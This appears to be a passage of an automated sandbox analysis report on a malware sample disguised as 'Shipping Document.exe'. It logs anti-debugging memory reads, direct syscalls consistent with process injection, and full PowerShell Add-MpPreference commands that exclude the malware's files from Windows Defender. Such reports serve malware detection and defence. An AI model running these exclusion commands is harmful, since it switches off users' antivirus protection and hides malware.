                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011047FB mov eax, dword ptr fs:[00000030h] 10_2_011047FB
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011047FB mov eax, dword ptr fs:[00000030h] 10_2_011047FB
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0118E7E1 mov eax, dword ptr fs:[00000030h] 10_2_0118E7E1
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011227ED mov eax, dword ptr fs:[00000030h] 10_2_011227ED
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011227ED mov eax, dword ptr fs:[00000030h] 10_2_011227ED
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011227ED mov eax, dword ptr fs:[00000030h] 10_2_011227ED
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142619 mov eax, dword ptr fs:[00000030h] 10_2_01142619
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0111260B mov eax, dword ptr fs:[00000030h] 10_2_0111260B
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0111260B mov eax, dword ptr fs:[00000030h] 10_2_0111260B
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0111260B mov eax, dword ptr fs:[00000030h] 10_2_0111260B
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0111260B mov eax, dword ptr fs:[00000030h] 10_2_0111260B
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0111260B mov eax, dword ptr fs:[00000030h] 10_2_0111260B
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0111260B mov eax, dword ptr fs:[00000030h] 10_2_0111260B
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0111260B mov eax, dword ptr fs:[00000030h] 10_2_0111260B
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117E609 mov eax, dword ptr fs:[00000030h] 10_2_0117E609
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01136620 mov eax, dword ptr fs:[00000030h] 10_2_01136620
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01138620 mov eax, dword ptr fs:[00000030h] 10_2_01138620
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0111E627 mov eax, dword ptr fs:[00000030h] 10_2_0111E627
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0110262C mov eax, dword ptr fs:[00000030h] 10_2_0110262C
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0111C640 mov eax, dword ptr fs:[00000030h] 10_2_0111C640
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01132674 mov eax, dword ptr fs:[00000030h] 10_2_01132674
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011C866E mov eax, dword ptr fs:[00000030h] 10_2_011C866E
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011C866E mov eax, dword ptr fs:[00000030h] 10_2_011C866E
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113A660 mov eax, dword ptr fs:[00000030h] 10_2_0113A660
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113A660 mov eax, dword ptr fs:[00000030h] 10_2_0113A660
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01104690 mov eax, dword ptr fs:[00000030h] 10_2_01104690
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01104690 mov eax, dword ptr fs:[00000030h] 10_2_01104690
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011366B0 mov eax, dword ptr fs:[00000030h] 10_2_011366B0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113C6A6 mov eax, dword ptr fs:[00000030h] 10_2_0113C6A6
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113A6C7 mov ebx, dword ptr fs:[00000030h] 10_2_0113A6C7
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113A6C7 mov eax, dword ptr fs:[00000030h] 10_2_0113A6C7
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117E6F2 mov eax, dword ptr fs:[00000030h] 10_2_0117E6F2
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117E6F2 mov eax, dword ptr fs:[00000030h] 10_2_0117E6F2
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117E6F2 mov eax, dword ptr fs:[00000030h] 10_2_0117E6F2
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117E6F2 mov eax, dword ptr fs:[00000030h] 10_2_0117E6F2
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011806F1 mov eax, dword ptr fs:[00000030h] 10_2_011806F1
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011806F1 mov eax, dword ptr fs:[00000030h] 10_2_011806F1
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0118C912 mov eax, dword ptr fs:[00000030h] 10_2_0118C912
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_010F8918 mov eax, dword ptr fs:[00000030h] 10_2_010F8918
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_010F8918 mov eax, dword ptr fs:[00000030h] 10_2_010F8918
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117E908 mov eax, dword ptr fs:[00000030h] 10_2_0117E908
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117E908 mov eax, dword ptr fs:[00000030h] 10_2_0117E908
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0118892A mov eax, dword ptr fs:[00000030h] 10_2_0118892A
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0119892B mov eax, dword ptr fs:[00000030h] 10_2_0119892B
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011D4940 mov eax, dword ptr fs:[00000030h] 10_2_011D4940
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01180946 mov eax, dword ptr fs:[00000030h] 10_2_01180946
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011A4978 mov eax, dword ptr fs:[00000030h] 10_2_011A4978
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011A4978 mov eax, dword ptr fs:[00000030h] 10_2_011A4978
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0118C97C mov eax, dword ptr fs:[00000030h] 10_2_0118C97C
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01126962 mov eax, dword ptr fs:[00000030h] 10_2_01126962
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01126962 mov eax, dword ptr fs:[00000030h] 10_2_01126962
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01126962 mov eax, dword ptr fs:[00000030h] 10_2_01126962
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0114096E mov eax, dword ptr fs:[00000030h] 10_2_0114096E
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0114096E mov edx, dword ptr fs:[00000030h] 10_2_0114096E
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0114096E mov eax, dword ptr fs:[00000030h] 10_2_0114096E
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011889B3 mov esi, dword ptr fs:[00000030h] 10_2_011889B3
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011889B3 mov eax, dword ptr fs:[00000030h] 10_2_011889B3
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011889B3 mov eax, dword ptr fs:[00000030h] 10_2_011889B3
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h] 10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h] 10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h] 10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h] 10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h] 10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h] 10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h] 10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h] 10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h] 10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h] 10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h] 10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h] 10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h] 10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011009AD mov eax, dword ptr fs:[00000030h] 10_2_011009AD
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011009AD mov eax, dword ptr fs:[00000030h] 10_2_011009AD
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0110A9D0 mov eax, dword ptr fs:[00000030h] 10_2_0110A9D0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0110A9D0 mov eax, dword ptr fs:[00000030h] 10_2_0110A9D0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0110A9D0 mov eax, dword ptr fs:[00000030h] 10_2_0110A9D0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0110A9D0 mov eax, dword ptr fs:[00000030h] 10_2_0110A9D0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0110A9D0 mov eax, dword ptr fs:[00000030h] 10_2_0110A9D0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0110A9D0 mov eax, dword ptr fs:[00000030h] 10_2_0110A9D0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011349D0 mov eax, dword ptr fs:[00000030h] 10_2_011349D0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011CA9D3 mov eax, dword ptr fs:[00000030h] 10_2_011CA9D3
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011969C0 mov eax, dword ptr fs:[00000030h] 10_2_011969C0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011329F9 mov eax, dword ptr fs:[00000030h] 10_2_011329F9
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011329F9 mov eax, dword ptr fs:[00000030h] 10_2_011329F9
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0118E9E0 mov eax, dword ptr fs:[00000030h] 10_2_0118E9E0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0118C810 mov eax, dword ptr fs:[00000030h] 10_2_0118C810
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011A483A mov eax, dword ptr fs:[00000030h] 10_2_011A483A
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011A483A mov eax, dword ptr fs:[00000030h] 10_2_011A483A
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113A830 mov eax, dword ptr fs:[00000030h] 10_2_0113A830
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01122835 mov eax, dword ptr fs:[00000030h] 10_2_01122835
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01122835 mov eax, dword ptr fs:[00000030h] 10_2_01122835
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01122835 mov eax, dword ptr fs:[00000030h] 10_2_01122835
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01122835 mov ecx, dword ptr fs:[00000030h] 10_2_01122835
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01122835 mov eax, dword ptr fs:[00000030h] 10_2_01122835
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01122835 mov eax, dword ptr fs:[00000030h] 10_2_01122835
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01130854 mov eax, dword ptr fs:[00000030h] 10_2_01130854
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01104859 mov eax, dword ptr fs:[00000030h] 10_2_01104859
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01104859 mov eax, dword ptr fs:[00000030h] 10_2_01104859
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01112840 mov ecx, dword ptr fs:[00000030h] 10_2_01112840
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01196870 mov eax, dword ptr fs:[00000030h] 10_2_01196870
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01196870 mov eax, dword ptr fs:[00000030h] 10_2_01196870
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0118E872 mov eax, dword ptr fs:[00000030h] 10_2_0118E872
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0118E872 mov eax, dword ptr fs:[00000030h] 10_2_0118E872
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0118C89D mov eax, dword ptr fs:[00000030h] 10_2_0118C89D
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01100887 mov eax, dword ptr fs:[00000030h] 10_2_01100887
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0112E8C0 mov eax, dword ptr fs:[00000030h] 10_2_0112E8C0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011D08C0 mov eax, dword ptr fs:[00000030h] 10_2_011D08C0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113C8F9 mov eax, dword ptr fs:[00000030h] 10_2_0113C8F9
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113C8F9 mov eax, dword ptr fs:[00000030h] 10_2_0113C8F9
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011CA8E4 mov eax, dword ptr fs:[00000030h] 10_2_011CA8E4
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h] 10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h] 10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h] 10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h] 10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h] 10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h] 10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h] 10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h] 10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h] 10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011D4B00 mov eax, dword ptr fs:[00000030h] 10_2_011D4B00
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0112EB20 mov eax, dword ptr fs:[00000030h] 10_2_0112EB20
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0112EB20 mov eax, dword ptr fs:[00000030h] 10_2_0112EB20
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011C8B28 mov eax, dword ptr fs:[00000030h] 10_2_011C8B28
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011C8B28 mov eax, dword ptr fs:[00000030h] 10_2_011C8B28
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011AEB50 mov eax, dword ptr fs:[00000030h] 10_2_011AEB50
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011D2B57 mov eax, dword ptr fs:[00000030h] 10_2_011D2B57
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011D2B57 mov eax, dword ptr fs:[00000030h] 10_2_011D2B57
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011D2B57 mov eax, dword ptr fs:[00000030h] 10_2_011D2B57
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011D2B57 mov eax, dword ptr fs:[00000030h] 10_2_011D2B57
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011B4B4B mov eax, dword ptr fs:[00000030h] 10_2_011B4B4B
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011B4B4B mov eax, dword ptr fs:[00000030h] 10_2_011B4B4B
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011A8B42 mov eax, dword ptr fs:[00000030h] 10_2_011A8B42
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01196B40 mov eax, dword ptr fs:[00000030h] 10_2_01196B40
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01196B40 mov eax, dword ptr fs:[00000030h] 10_2_01196B40
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011CAB40 mov eax, dword ptr fs:[00000030h] 10_2_011CAB40
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_010F8B50 mov eax, dword ptr fs:[00000030h] 10_2_010F8B50
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_010FCB7E mov eax, dword ptr fs:[00000030h] 10_2_010FCB7E
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011B4BB0 mov eax, dword ptr fs:[00000030h] 10_2_011B4BB0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011B4BB0 mov eax, dword ptr fs:[00000030h] 10_2_011B4BB0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110BBE mov eax, dword ptr fs:[00000030h] 10_2_01110BBE
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110BBE mov eax, dword ptr fs:[00000030h] 10_2_01110BBE
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011AEBD0 mov eax, dword ptr fs:[00000030h] 10_2_011AEBD0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01120BCB mov eax, dword ptr fs:[00000030h] 10_2_01120BCB
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01120BCB mov eax, dword ptr fs:[00000030h] 10_2_01120BCB
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01120BCB mov eax, dword ptr fs:[00000030h] 10_2_01120BCB
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01100BCD mov eax, dword ptr fs:[00000030h] 10_2_01100BCD
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01100BCD mov eax, dword ptr fs:[00000030h] 10_2_01100BCD
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01100BCD mov eax, dword ptr fs:[00000030h] 10_2_01100BCD
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01108BF0 mov eax, dword ptr fs:[00000030h] 10_2_01108BF0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01108BF0 mov eax, dword ptr fs:[00000030h] 10_2_01108BF0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01108BF0 mov eax, dword ptr fs:[00000030h] 10_2_01108BF0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0118CBF0 mov eax, dword ptr fs:[00000030h] 10_2_0118CBF0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0112EBFC mov eax, dword ptr fs:[00000030h] 10_2_0112EBFC
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0118CA11 mov eax, dword ptr fs:[00000030h] 10_2_0118CA11
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01124A35 mov eax, dword ptr fs:[00000030h] 10_2_01124A35
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01124A35 mov eax, dword ptr fs:[00000030h] 10_2_01124A35
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113CA38 mov eax, dword ptr fs:[00000030h] 10_2_0113CA38
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113CA24 mov eax, dword ptr fs:[00000030h] 10_2_0113CA24
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0112EA2E mov eax, dword ptr fs:[00000030h] 10_2_0112EA2E
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01106A50 mov eax, dword ptr fs:[00000030h] 10_2_01106A50
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01106A50 mov eax, dword ptr fs:[00000030h] 10_2_01106A50
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01106A50 mov eax, dword ptr fs:[00000030h] 10_2_01106A50
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01106A50 mov eax, dword ptr fs:[00000030h] 10_2_01106A50
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01106A50 mov eax, dword ptr fs:[00000030h] 10_2_01106A50
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01106A50 mov eax, dword ptr fs:[00000030h] 10_2_01106A50
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01106A50 mov eax, dword ptr fs:[00000030h] 10_2_01106A50
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110A5B mov eax, dword ptr fs:[00000030h] 10_2_01110A5B
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110A5B mov eax, dword ptr fs:[00000030h] 10_2_01110A5B
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117CA72 mov eax, dword ptr fs:[00000030h] 10_2_0117CA72
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117CA72 mov eax, dword ptr fs:[00000030h] 10_2_0117CA72
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011AEA60 mov eax, dword ptr fs:[00000030h] 10_2_011AEA60
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113CA6F mov eax, dword ptr fs:[00000030h] 10_2_0113CA6F
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113CA6F mov eax, dword ptr fs:[00000030h] 10_2_0113CA6F
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113CA6F mov eax, dword ptr fs:[00000030h] 10_2_0113CA6F
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01138A90 mov edx, dword ptr fs:[00000030h] 10_2_01138A90
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4A80 mov eax, dword ptr fs:[00000030h]10_2_011D4A80
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\Shipping Document.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe"
                Source: C:\Users\user\Desktop\Shipping Document.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KOENBvWt.exe"
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtWriteVirtualMemory: Direct from: 0x77762E3C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtMapViewOfSection: Direct from: 0x77762D1C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtNotifyChangeKey: Direct from: 0x77763C2C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtCreateMutant: Direct from: 0x777635CC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtResumeThread: Direct from: 0x777636AC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtProtectVirtualMemory: Direct from: 0x77757B2E
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtQuerySystemInformation: Direct from: 0x77762DFC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtAllocateVirtualMemory: Direct from: 0x77762BFC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtReadFile: Direct from: 0x77762ADC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtDelayExecution: Direct from: 0x77762DDC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtWriteVirtualMemory: Direct from: 0x7776490C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtQueryInformationProcess: Direct from: 0x77762C26
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtResumeThread: Direct from: 0x77762FBC
